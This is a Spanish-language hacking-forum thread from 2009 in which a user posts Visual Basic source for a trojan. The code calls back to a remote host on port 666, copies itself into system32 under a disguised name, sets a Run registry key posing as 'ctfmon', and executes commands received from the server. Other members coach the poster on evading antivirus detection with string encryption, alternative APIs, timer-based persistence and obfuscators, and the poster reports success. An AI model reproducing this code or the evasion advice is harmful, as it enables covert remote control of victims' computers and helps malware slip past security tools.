Tema destacado:  Suscripción al boletín mensual de elhacker.net
 Autor
|
Tema: programa en vb detectado por av (Leído 2,969 veces)
|
50l3r
 Desconectado
Mensajes: 758
Todo lo que se por la cuarta parte que desconozco
|
veran, he estado realizando un troyano el cual ejecuta funciones shell() remotamente, osease, una shell remota pero me he dado con un canto en los dientes cuando he visto esto:  Detectado? si acaba de salir del horno, como puedo arreglar eso? el server del troyano es el que esta siendo analizado, lo compile con la libreria del winsock en rar haciendo un fichero compilado y que el server mandase al .ocx que se moviese en system32 digo esto por si fuese el motivo por el cual mi reciente malware es detectado gracias  |
|
|
|
|
En línea
|
|
|
|
|
Karcrack
|
veran, he estado realizando un troyano el cual ejecuta funciones shell() remotamente, osease, una shell remota
Eso no es un Shell Remota... Podrías probar a cifrar las cadenas de tu proyecto: También puedes probar a crear PIPES o usar APIs para hacer lo que haces Shell() por ejemplo WinExec/CreateProcessSaludos 
|
|
|
|
|
En línea
|
|
|
|
50l3r
Desconectado
Mensajes: 758
Todo lo que se por la cuarta parte que desconozco
|
wow, buen programa, lo voy a usar haber igual si que funcionaba con apis pero lo malo es que aun no controlo muy bien las apis a una pregunta, como catalogarias el software este? yo pense que seria shell remota ---- edito probe tu programa, puse mi proyecto, lo abri y tenia un modulo mas me parece e hize el .exe pero aun asi el nod me lo detectaba como heuristica cuales son mis posibilidades ahora?  |
|
|
|
« Última modificación: 17 Mayo 2009, 16:26 por 50l3r »
|
En línea
|
|
|
|
braulio--
Wiki
Desconectado
Mensajes: 889
Imagen recursiva
|
Puedes usar el nuevo cactus metamorph que ha hecho hacker_zero para ver si funciona o el cactus ofuscator de mad antrax.
|
|
|
|
|
En línea
|
|
|
|
|
~~
|
Sin ver el código dificil decirte, pero seguro que en el form_load haces que se añada al registro y de más, prueba a ponerlo en un timer y da más datos del código...
|
|
|
|
|
En línea
|
|
|
|
50l3r
Desconectado
Mensajes: 758
Todo lo que se por la cuarta parte que desconozco
|
aqui pongo el code: Private Sub cmdconectar_Click()
On Error GoTo error
If Not wsk.State = 7 Then GoTo puente
GoTo error
puente:
wsk.Close
wsk.Connect
error:
End Sub
Public Sub Form_Load()
Dim ejec As String
Dim win, sys, residencia
On Error Resume Next
wsk.Protocol = sckTCPProtocol
wsk.RemoteHost = "----------"
wsk.RemotePort = "666"
ejec = App.Path
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"
ejec = ejec & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
If Dir(sys & "\hole.exe", vbArchive) Then Kill sys & "\hole.exe"
FileCopy ejec, sys & "\hole"
Name sys & "\hole" As sys & "\hole.exe"
Set residencia = CreateObject("WScript.Shell")
[color=red][b]residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "ctfmon", sys & "\hole.exe"[/b][/color]
End Sub
Private Sub Timer1_Timer()
On Error GoTo error
If Not wsk.State = 7 Then Call cmdconectar_Click
error:
End Sub
Private Sub wsk_DataArrival(ByVal bytesTotal As Long)
Dim orden As String
On Error GoTo error
wsk.GetData orden
Shell orden
error:
End Sub
si, en el form, se añade al registro, le he quitado la funcion taskvisibla false porque eso tambien sera detectado y si en vez de añadirlo al registro lo copio en la carpeta inicio de allusers? |
|
|
|
|
En línea
|
|
|
|
|
~~
|
Cambia ese código a un timer
|
|
|
|
|
En línea
|
|
|
|
XcryptOR
Desconectado
Mensajes: 225
|
cifra las cadenas, sin hacerlo jamas dejaran de detectar tu troyano, usa un asimple cifrado XOR eso basta para la mayoria, digo todos los que conozco
|
|
|
|
|
En línea
|
|
|
|
50l3r
Desconectado
Mensajes: 758
Todo lo que se por la cuarta parte que desconozco
|
lo que hice fue meter la orden de clave de registro en un timer, al parecer era eso, ahora hata va mejor porque si eliminas la clave se regenera cada 1 segundo  muchas gracias |
|
|
|
|
En línea
|
|
|
|
|
Karcrack
|
Puedes usar el nuevo cactus metamorph que ha hecho hacker_zero para ver si funciona o el cactus ofuscator de mad antrax.
Hacker_Zero no ha codeado un Cactus Metamoph  Si te has leído bien el post que ha hecho Hacker_Zero sabrás que todavía no funciona correctamente con ejecutables de VB y Delphi....
Por lo visto el problema es que haces todo lo ' malo' en Form_Load creo que te lo hubieras podido saltar cambiandolo a Form_Initialize... De todas formas te viene mejor para la persistencia lo del Timer  a una pregunta, como catalogarias el software este? yo pense que seria shell remota
Yo le llamaría Ejecutador Remoto  , ya que hace lo mismo que el [INICIO] + [R] Saludos
|
|
|
|
« Última modificación: 17 Mayo 2009, 18:32 por Karcrack »
|
En línea
|
|
|
|
braulio--
Wiki
Desconectado
Mensajes: 889
Imagen recursiva
|
Puedes usar el nuevo cactus metamorph que ha hecho hacker_zero para ver si funciona o el cactus ofuscator de mad antrax.
Hacker_Zero no ha codeado un Cactus Metamoph Si te has leído bien el post que ha hecho Hacker_Zero sabrás que todavía no funciona correctamente con ejecutables de VB y Delphi.... Sorry, quise decir virus metamorph
|
|
|
|
|
En línea
|
|
|
|
50l3r
Desconectado
Mensajes: 758
Todo lo que se por la cuarta parte que desconozco
|
omg, ejecutador remoto, me gusta lo malo es que como esta la cosa, faltan conocimientos de vb aun no puedo ver las salidas de la cmd ains |
|
|
|
|
En línea
|
|
|
|
|
Karcrack
|
omg, ejecutador remoto, me gusta lo malo es que como esta la cosa, faltan conocimientos de vb aun no puedo ver las salidas de la cmd ains Tranquilo hombre, nadie nace sabiendo (Aunque algunos piensen que ellos si ) Revisa este code de Cobein : :http://foro.elhacker.net/programacion_vb/jugaba_a_que_hacia_un_troyano_source-t211260.0.html
|
|
|
|
|
En línea
|
|
|
|
|
~~
|
O también puedes poner timer.enable = false (creo que era así que hace que no toco VB como un año) y así no estás copiando lo mismo al registro todo el rato...
Más que nada por que algunos AV's (como el KAV) muestran un mensajito de aceptar/rechazar cada vez que se copia al registro y sería bastante sospechoso...
|
|
|
|
|
En línea
|
|
|
|
50l3r
Desconectado
Mensajes: 758
Todo lo que se por la cuarta parte que desconozco
|
um, tienes razon, me pasa lo mismo con el proceso teatimer del sybot sd
um pues tendre que quitarlo, gracias por la informacion
|
|
|
|
|
En línea
|
|
|
|
|
 |
